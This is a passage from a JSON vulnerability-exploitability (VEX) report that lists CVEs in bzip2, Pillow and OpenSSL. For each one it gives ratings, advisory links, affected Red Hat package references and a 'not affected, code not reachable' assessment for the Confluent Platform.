          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42250",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "bzip2 contains an off\u2011by\u2011one error in the bzip2recover utility. When processing a specially crafted file, the application performs an out\u2011of\u2011bounds write to a global buffer, resulting in memory corruption and a crash (denial of service).\n\nThis issue was fixed in bzip2 patch\u00a035d122a3df8b0cc4082a4d89fdc6ee99f375fe67",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42250"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42250"
        },
        {
          "url": "https://cert.pl/en/posts/2026/05/CVE-2026-42250/"
        },
        {
          "url": "https://inbox.sourceware.org/bzip2-devel/20260528145407.293768-1-mark@klomp.org/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42250"
        },
        {
          "url": "https://sourceware.org/bzip2/"
        },
        {
          "url": "https://sourceware.org/cgit/bzip2/commit/?id=35d122a3df8b0cc4082a4d89fdc6ee99f375fe67"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42250"
        }
      ],
      "published": "2026-05-28T14:16:19+00:00",
      "updated": "2026-06-17T10:47:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.0.6-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/bzip2-libs@1.0.6-28.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42308",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "Pillow is a Python imaging library. Prior to version 12.2.0, if a font advances for each glyph by an exceeding large amount, when Pillow keeps track of the current position, it may lead to an integer overflow. This issue has been patched in version 12.2.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42308"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42308"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pillow/PYSEC-2026-165.yaml"
        },
        {
          "url": "https://github.com/python-pillow/Pillow"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/pull/9518/changes%20%28suspected%20fix%29"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0"
        },
        {
          "url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-wjx4-4jcj-g98j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42308"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8399-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42308"
        }
      ],
      "published": "2026-05-09T06:16:09+00:00",
      "updated": "2026-07-24T21:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-42765",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: When a partial-chain certificate verification is enabled\ntogether with OCSP response checking for the whole chain, a NULL dereference\nwill happen if the verified chain does not have a self-signed trusted anchor,\ncrashing the process.\n\nImpact summary: A NULL pointer dereference can trigger a crash which leads to a\nDenial of Service for an application.\n\nWhen performing OCSP response checking for certificates in the verification\nchain, the code always tries to access the next certificate as the issuer.\nThere is a check for a self-signed certificate. However with the partial\nchain verification enabled when the chain does not have a self-signed trusted\nanchor, the issuer will be NULL for the last certificate in the chain. A NULL\npointer dereference then happens.\n\nThis issue affects only applications which enable both OCSP verification\nof the certificate chain (X509_V_FLAG_OCSP_RESP_CHECK_ALL) and partial\nchain verification (X509_V_FLAG_PARTIAL_CHAIN) in the certificate\nverification. Both flags are disabled by default. For that reason, we have\nassigned Low severity to the issue.\n\nNo FIPS modules are affected by this issue as the affected code is outside\nthe OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42765"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-42765"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/14340b7fa1d444615486bc137014b064e64ec334"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/eb345da18ce2216b2f3ade9c2bc23e068487fa97"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42765"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42765"
        }
      ],
      "published": "2026-06-09T17:17:07+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
